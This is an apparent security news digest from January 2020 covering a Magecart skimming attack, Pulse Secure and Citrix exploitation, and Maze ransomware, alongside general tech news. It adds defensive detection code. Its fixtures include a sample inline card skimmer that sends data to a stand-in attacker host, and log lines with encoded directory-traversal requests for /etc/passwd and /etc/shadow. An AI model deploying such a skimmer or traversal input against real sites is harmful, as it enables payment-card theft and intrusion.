AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response


InfoSec News Nuggets 1/14/2020

1 – Australia Bushfire Donors Affected by Credit Card Skimming Attack

Attackers have compromised a website collecting donations for the victims of the Australia bushfires and injected a malicious script that steals donors' payment information. This type of attack is known as Magecart: attackers compromise a website and inject malicious JavaScript into e-commerce or checkout pages. The script captures any credit card or payment details submitted through the page and sends them to a remote server under the attacker's control, while the legitimate transaction still completes, so neither the donor nor the site owner notices anything wrong. The Malwarebytes Threat Intelligence Team discovered a legitimate website collecting donations for the tragic bushfires in Australia that had been compromised by a Magecart script.
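The practical first step when checking a checkout or donation page for this kind of injection is to list every script the page loads and compare it against what the site owner actually intended to ship. The following is an added example, not code from the original post or from Malwarebytes: it parses a page's HTML, flags external scripts whose origin is not on an allowlist, notes allowed third-party scripts that carry no Subresource Integrity hash, and applies simple heuristics to inline scripts that both read payment fields and send data off the page. The allowlist, the sample page and the attacker hostname are constructed for the example.

```python
"""Audit a checkout page for Magecart-style script injection.

Added example (not from the original post or Malwarebytes). The allowlist
and the sample HTML below are constructed; adjust the allowlist to the
origins your own checkout page is supposed to load scripts from.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist for a hypothetical donation site (assumption):
# the site's own origin plus its payment provider.
ALLOWED_SCRIPT_ORIGINS = {"www.example-donations.org", "js.stripe.com"}

# Heuristics for inline skimmers: they read card fields and ship them out,
# often with some obfuscation to survive a casual look at the page source.
CARD_FIELD_RE = re.compile(r"card|cvv|cvc|expir", re.I)
EXFIL_RE = re.compile(r"new Image\(|XMLHttpRequest|fetch\(|sendBeacon\(|\.src\s*=", re.I)
OBFUSCATION_RE = re.compile(r"atob\(|fromCharCode|unescape\(|eval\(|[A-Za-z0-9+/=]{80,}")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []   # (src, has_integrity_attribute)
        self.inline = []     # inline script text
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def audit_checkout_page(html, allowed_origins=ALLOWED_SCRIPT_ORIGINS):
    """Return a list of (kind, detail) findings for scripts that merit review."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, has_sri in parser.external:
        host = urlparse(src).hostname   # None for a relative src (same origin)
        if host and host not in allowed_origins:
            findings.append(("unknown_script_origin", host))
        elif host and not has_sri:
            # An allowed but externally hosted script without Subresource
            # Integrity can be swapped at the CDN without touching your page.
            findings.append(("allowed_origin_without_sri", src))
    for body in parser.inline:
        reads_card = bool(CARD_FIELD_RE.search(body))
        sends = bool(EXFIL_RE.search(body))
        obfuscated = bool(OBFUSCATION_RE.search(body))
        if (reads_card and sends) or obfuscated:
            findings.append(("suspicious_inline_script", body[:60]))
    return findings


# Constructed sample checkout page: a first-party script, the payment
# provider's script, an injected external loader and an injected inline
# skimmer. The attacker hostname is made up for this example.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="donate"><input name="card_number"><input name="cvv"></form>
<script src="/static/app.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="//stats-cdn.example-attacker.net/collect.js"></script>
<script>
document.getElementById('donate').addEventListener('submit', function () {
  var n = document.querySelector('[name=card_number]').value;
  new Image().src = 'https://stats-cdn.example-attacker.net/i?q=' + btoa(n);
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_CHECKOUT_HTML):
        print(f"{kind}: {detail}")
```

Run it against a saved copy of the live page (not the one in your repository) and diff the results over time: a new external origin or a new inline script on a page that should not change is the signal that matters, and a Content Security Policy that restricts script-src to the allowlisted origins turns the same check into a browser-enforced control.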


2 – Continued Exploitation of Pulse Secure VPN Vulnerability

Unpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch for CVE-2019-11510 can be compromised in an attack. The flaw is an arbitrary file read reachable without authentication via a crafted URI, not itself a remote code execution bug, although it has been chained with other Pulse Secure vulnerabilities to take full control of the appliance; the files it exposes include cached credentials and session data, which attackers have used to log into the VPN as legitimate users. Although Pulse Secure disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510. CISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes. Because the vulnerability leaks credentials, applying the patch is not sufficient on its own for a device that was exposed while unpatched: passwords and other secrets stored on the appliance should be reset and the appliance's logs reviewed for earlier exploitation.


3 – Tesla is challenging hackers to crack its car, and it is putting ~$1 million on the line

Tesla has been investing more in its cybersecurity over the last few years, and now it is returning to Pwn2Own to challenge hackers to crack its cars, with ~$1 million and a few Model 3 vehicles on the line. Last year, Tesla went to Vancouver for Pwn2Own, a hacking competition run by Trend Micro's Zero Day Initiative (ZDI), and offered a Model 3 to whoever managed to find and exploit certain vulnerabilities in the vehicle's systems. A hacking duo targeted the infotainment system on the Tesla Model 3 and used "a JIT bug in the renderer" to take control of it. They left with a brand new Model 3.


4 – Proof-of-concept code published for Citrix bug as attacks intensify

As of yesterday, public proof-of-concept exploit code exists for CVE-2019-19781, a vulnerability in Citrix enterprise equipment that can allow attackers to take over the devices and reach a company's internal network. The vulnerability is as bad as it gets and has been deemed one of the most dangerous bugs disclosed in recent years. Nicknamed Shitrix by the wider infosec community, it affects Citrix Application Delivery Controller (ADC), formerly known as NetScaler ADC, and Citrix Gateway, formerly known as NetScaler Gateway. At the time of writing, Citrix had published only a configuration-based mitigation, with firmware fixes still pending, so administrators should confirm that the mitigation has actually been applied to every exposed appliance rather than waiting for a patch, and should treat an unmitigated device that was reachable from the internet as potentially already compromised now that the exploit is public.
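Both the Pulse Secure item above and this Citrix item concern pre-authentication flaws that are triggered by a crafted request path, so the same detection question applies to each: did anyone send our appliance a traversal-style URI, and did it get a 200 back? The following is an added example, not code from CISA, Citrix or Pulse Secure. It scans combined-format access log lines (an assumption about how the appliance or a fronting proxy logs requests), URL-decodes each path repeatedly to catch single- and double-encoded sequences, and reports whether the decoded path climbs above the web root. The log lines are constructed for the example and use generic paths; the product-specific URIs are documented in the vendor advisories and are not reproduced here.

```python
"""Find directory-traversal attempts in web access logs.

Added example (not from CISA, Citrix or Pulse Secure). Assumes combined-
format access log lines; the sample lines below are constructed and use
generic paths rather than any product-specific vulnerable endpoint.
"""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def decode_fully(path, rounds=3):
    """URL-decode until the value stops changing (bounded to avoid loops)."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def lowest_depth(path):
    """Walk the path segments; a negative result means it escaped the web root."""
    depth = 0
    lowest = 0
    # Strip any query string and treat backslashes as separators too.
    for seg in re.split(r"[\\/]+", path.split("?", 1)[0]):
        if seg == "..":
            depth -= 1
            lowest = min(lowest, depth)
        elif seg and seg != ".":
            depth += 1
    return lowest


def scan_access_log(text):
    """Return one dict per request whose decoded path contains a '..' segment."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m["path"]
        decoded = decode_fully(raw)
        if ".." not in decoded:
            continue
        lowest = lowest_depth(decoded)
        status = int(m["status"])
        hits.append({
            "ip": m["ip"],
            "timestamp": m["ts"],
            "status": status,
            "raw": raw,
            "decoded": decoded,
            "encoded": raw != decoded,
            "double_encoded": unquote(raw) != decoded,
            "escapes_root": lowest < 0,
            # A traversal that leaves the web root and gets a 200 back is the
            # line to escalate first; a 403/404 still shows someone probing.
            "likely_success": lowest < 0 and status == 200,
        })
    return hits


# Constructed sample log (not real traffic). Line 2 is a plain traversal,
# line 3 is URL-encoded, line 4 is double-encoded, line 5 contains '..'
# but never leaves the web root.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jan/2020:10:01:02 +0000] "GET /login/welcome HTTP/1.1" 200 5120
198.51.100.7 - - [13/Jan/2020:10:01:09 +0000] "GET /portal/../../../../etc/passwd HTTP/1.1" 200 1811
198.51.100.7 - - [13/Jan/2020:10:01:11 +0000] "GET /portal/%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 229
203.0.113.9 - - [13/Jan/2020:10:02:30 +0000] "GET /assets/%252e%252e%252f%252e%252e%252fetc/shadow HTTP/1.1" 403 0
10.0.0.8 - - [13/Jan/2020:10:03:00 +0000] "GET /docs/a/../b.html HTTP/1.1" 200 912
10.0.0.8 - - [13/Jan/2020:10:03:05 +0000] "POST /login HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for h in scan_access_log(SAMPLE_LOG):
        flag = "SUCCESS?" if h["likely_success"] else "probe"
        print(f"{h['ip']} {h['status']} {flag} {h['decoded']}")
```

The decoding loop matters more than it looks: a filter that only decodes once passes double-encoded sequences straight through, which is exactly the trick attackers reach for when a WAF or a hastily written responder rule matches on the literal `../` string. Run the scan over logs going back to the vulnerability's disclosure date, not just since the exploit went public.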


5 – Maze Ransomware Publishes 14GB of Stolen Southwire Files

The Maze Ransomware operators have released an additional 14GB of files that they claim were stolen from a victim that did not pay their ransom demand. In December, the Maze operators attacked Southwire, a wire and cable manufacturer based in Georgia, and allegedly stole 120GB of files before encrypting 878 devices on the network. Maze then demanded $6 million in bitcoin or they would publicly release Southwire's stolen files. When Southwire did not pay, the Maze operators uploaded some of the company's files to a "News" site they had created to shame non-paying victims.


6 – Facebook Says Encrypting Messenger by Default Will Take Years

In March of last year, Mark Zuckerberg made a dramatic pledge: Facebook would apply end-to-end encryption to user communications across all of its platforms by default. The move would grant strong new protections to well over a billion users. It’s also not happening anytime soon. What Zuckerberg didn’t spell out at the time is just how difficult that transition would be to pull off, and not just in terms of political hurdles from encryption-averse law enforcement or a shift in Facebook’s business model. Encrypting Facebook Messenger alone represents a Herculean technical challenge. According to one of the Facebook engineers leading the effort, a version of Messenger that’s fully end-to-end encrypted by default remains years away.


7 – Computers Are Learning to See in Higher Dimensions

Computers can now drive cars, beat world champions at board games like chess and Go, and even write prose. The revolution in artificial intelligence stems in large part from the power of one particular kind of artificial neural network, whose design is inspired by the connected layers of neurons in the mammalian visual cortex. These “convolutional neural networks” (CNNs) have proved surprisingly adept at learning patterns in two-dimensional data—especially in computer vision tasks like recognizing handwritten words and objects in digital images.


8 – CES 2020: Neon is an ‘artificial human’ that Samsung wants to be your friend

One of the most unusual tech projects unveiled at CES 2020 this year is Neon, an "artificial human" designed by the Samsung Technology and Advanced Research Labs (STAR Labs). Neon is essentially a humanoid artificial intelligence (AI) avatar that looks like a human and can respond to questions in near real time while producing expressions such as a smile or a raised eyebrow as it does so. It is a chat bot, but it is not a true AI assistant, and it is not intended to be all-knowing. You can't ask it what year Elvis Presley died (1977), or which breed of dog is best (golden retriever), and expect an answer. Instead, the bot is there to keep someone company and serve as a friend.


9 – Don’t trust the US gov’t, states tell court in T-Mobile/Sprint merger case

The United States government approved the T-Mobile/Sprint merger without fully investigating whether the deal’s anti-competitive harms can be offset by merger conditions, state attorneys general argued in a court filing. The US approved the merger on the conditions that the merging companies deploy 5G nationwide and sell spectrum licenses and other assets to Dish Network to help Dish create a new mobile service. With states having sued the companies to block the merger, the DOJ and FCC last month urged the court to reject the lawsuit and trust the federal government’s conclusions.


10 – Apple denies Barr’s request to unlock Pensacola shooter’s iPhones

In a statement issued to Input late today, Apple rebutted Barr's characterization of the situation, saying it has responded to all law enforcement requests for help extracting data from two iPhones belonging to Mohammed Saeed Alshamrani. Alshamrani is suspected of gunning down three sailors and injuring eight others in an attack at the Naval Air Station in December. "We reject the characterization that Apple has not provided substantive assistance in the Pensacola investigation. Our responses to their many requests since the attack have been timely, thorough and are ongoing," Apple says. The company promised to continue to assist the Federal Bureau of Investigation as the case evolves.
